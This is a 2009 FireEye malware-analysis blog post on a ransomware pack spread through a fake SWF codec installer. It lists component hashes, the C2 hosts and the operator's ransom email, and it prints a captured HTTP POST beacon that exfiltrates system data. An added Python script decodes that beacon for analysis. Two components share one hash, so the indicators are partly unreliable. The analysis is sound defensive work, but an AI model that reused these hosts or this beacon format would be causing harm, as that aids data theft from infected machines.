I recently got an important clue about how the ransom exchange takes place between a victim and the cyber criminals. One of our readers who fell victim to this ransomware emailed the malware author at the address otrazhenie_zla@mail.ru asking for his files to be recovered. This was the author's response:
"Transfer into account pay pal 50 dollars here email pay pal otrazhenie_zla@mail.ru"
Interestingly, instead of the standard $10 ransom mentioned in his earlier message, the author asked the victim for $50 - typical criminal mentality, isn't it? Unfortunately his greed doesn't end there. This malware instance came bundled in a fake 'SWF video codec' installer. Upon execution, the setup file installs three different pieces of malware on the victim's machine, including the ransomware:
1. 5f9927ee59b4881a2ce8634332f63fa8
Trojan Encoder, the component that encrypts the user's files and demands a ransom for their recovery.
2. 010d7b79d002d747f420a7880f89ee38
A password-stealing Trojan that uploads the user's personal information to a remote command and control server (antivirusubdate.no-ip.biz) using an obfuscated protocol on TCP port 3460.
3. 010d7b79d002d747f420a7880f89ee38
The last component collects system information such as running processes, installed Windows patches and the machine's NetBIOS name, and uploads it to a remote server, updatecodec.freehostia.com. It makes no attempt to install itself permanently on the infected system, so my best guess is that its sole purpose is to register zombie machines with the command and control server.
Here is the outbound communication generated by this last piece. The system information is uploaded via an HTTP POST, with the collected data base64-encoded into the c= form field (the other fields are sent empty):
POST /gate/gate.php HTTP/1.0
Host: updatecodec.freehostia.com
Content-Type: application/x-www-form-urlencoded
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)
Content-Length: 4042
a=&b=&d=&c=UDNNTAAAAAD2CQAAEQAAAAAAAAAIAAAAHQwXChuMjkQSAAAAAAAAABAAAAAqCAIAAgAOAAoA
NAAXAKoBEwAAAAAAAACkAAAApAAAAAMAAAA3NjQ4Ny02NDUtMDIxNDk0MS0yMzAxNwAuAAAA
QTIyLTAwMDAxAAAAAAAAAGx+5EzmkF4U7a3aFQ6iAQAAAAAAPH6iSfwWCAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAA1NjIyMAAAAAAAAAAaGAAAuMjkSIAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAOX66RcUAAAAAAAAAAQAAAAezQ4AAAAAAAAAAAAgAAAAVXBkYXRl
IGZvciBXaW5kb3dzIFhQIChLQjkxMTE2NCkBAAAAAAAAAAEAAAAxAAAAAAAAAAApAAAAU2Vj
dXJpdHkgVXBkYXRlIGZvciBXaW5kb3dzIFhQIChLQjkyMTg4MykBAAAAAAAAAAEAAAAxAAAA
.......
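To show what that "encoded form" actually contains, here is an added example (written for this edit; it is not code from the original post or from FireEye) that parses the captured request above and decodes the c= field. The request is the one printed on the page, with the blank line between headers and body restored and the body kept exactly as the page wraps and truncates it, so the decoded blob is shorter than the Content-Length header claims. The function names are my own. Two things the decoded bytes show, which the author does not document, are a "P3ML" header at the start of the blob and a 32-bit length field in front of each of the patch-name strings.

```python
import base64
import re

# The POST shown in the post above. Header/body separator restored; the body
# is the blog's line-wrapped copy and stops where the page prints ".......",
# so it is shorter than the Content-Length value (4042) says.
CAPTURE = (
    "POST /gate/gate.php HTTP/1.0\r\n"
    "Host: updatecodec.freehostia.com\r\n"
    "Content-Type: application/x-www-form-urlencoded\r\n"
    "Connection: Keep-Alive\r\n"
    "Pragma: no-cache\r\n"
    "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; "
    "InfoPath.2; .NET CLR 2.0.50727; InfoPath.1)\r\n"
    "Content-Length: 4042\r\n"
    "\r\n"
    "a=&b=&d=&c=UDNNTAAAAAD2CQAAEQAAAAAAAAAIAAAAHQwXChuMjkQSAAAAAAAAABAAAAAqCAIAAgAOAAoA\n"
    "NAAXAKoBEwAAAAAAAACkAAAApAAAAAMAAAA3NjQ4Ny02NDUtMDIxNDk0MS0yMzAxNwAuAAAA\n"
    "QTIyLTAwMDAxAAAAAAAAAGx+5EzmkF4U7a3aFQ6iAQAAAAAAPH6iSfwWCAAAAAAAAAAAAAAA\n"
    "AAAAAAAAAAAAAAAAAAA1NjIyMAAAAAAAAAAaGAAAuMjkSIAAAAAAAAAAAAAAAAAAAAAAAAAA\n"
    "AAAAAAAAAAAAAAAAAAAAAOX66RcUAAAAAAAAAAQAAAAezQ4AAAAAAAAAAAAgAAAAVXBkYXRl\n"
    "IGZvciBXaW5kb3dzIFhQIChLQjkxMTE2NCkBAAAAAAAAAAEAAAAxAAAAAAAAAAApAAAAU2Vj\n"
    "dXJpdHkgVXBkYXRlIGZvciBXaW5kb3dzIFhQIChLQjkyMTg4MykBAAAAAAAAAAEAAAAxAAAA\n"
)


def parse_http_request(raw):
    """Split a raw HTTP request into (method, path, headers, body)."""
    head, _, body = raw.partition("\r\n\r\n")
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body


def parse_form_body(body):
    """Split an x-www-form-urlencoded body WITHOUT URL-decoding the values.

    urllib.parse.parse_qs would turn every '+' into a space, which corrupts
    base64 (this capture contains a '+'); the bot sends the base64 raw.
    """
    fields = {}
    for pair in body.split("&"):
        name, _, value = pair.partition("=")
        fields[name] = value
    return fields


def decode_payload(value):
    """Base64-decode a line-wrapped value, tolerating absent '=' padding."""
    compact = re.sub(r"\s+", "", value)
    compact += "=" * (-len(compact) % 4)
    return base64.b64decode(compact)


def printable_strings(blob, min_len=4):
    """Pull out runs of printable ASCII, the way the `strings` tool does."""
    pattern = rb"[\x20-\x7e]{%d,}" % min_len
    return [m.decode("ascii") for m in re.findall(pattern, blob)]


def analyze(raw=CAPTURE):
    """Return the network indicators and the decoded content of one beacon."""
    method, path, headers, body = parse_http_request(raw)
    fields = parse_form_body(body)
    blob = decode_payload(fields["c"])
    return {
        "method": method,
        "host": headers.get("host"),
        "path": path,
        "user_agent": headers.get("user-agent"),
        "empty_fields": sorted(k for k, v in fields.items() if v == ""),
        "magic": blob[:4],          # 'P3ML' in this capture
        "decoded_len": len(blob),
        "strings": printable_strings(blob),
    }


if __name__ == "__main__":
    result = analyze()
    print(result["method"], result["host"], result["path"], result["magic"])
    for s in result["strings"]:
        print("  ", s)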
So what we see here is that one malware component encrypts the user's files and demands a ransom, while at the same time the other components start stealing the user's personal information. This multi-layered malware installation is another strong piece of evidence for my BotnetWeb theory. Here is my advice for victims of this malware pack:
Step 1:
Recover your files using the recovery tool provided by Dr.Web, as mentioned in Part 1.
Step 2:
Change all login credentials that were used on the infected system. Do this from a clean machine: the password-stealing component is still running on the infected one and would capture the new credentials too.
Step 3:
Back up your data files and re-image the infected machine.
Atif Mushtaq @ FireEye Malware Intelligence Lab
Question/Comments : research SHIFT-2 fireeye DOT COM

so, how long until those websites get shut down?
Posted by: joe blow | 2009.06.08 at 03:14 PM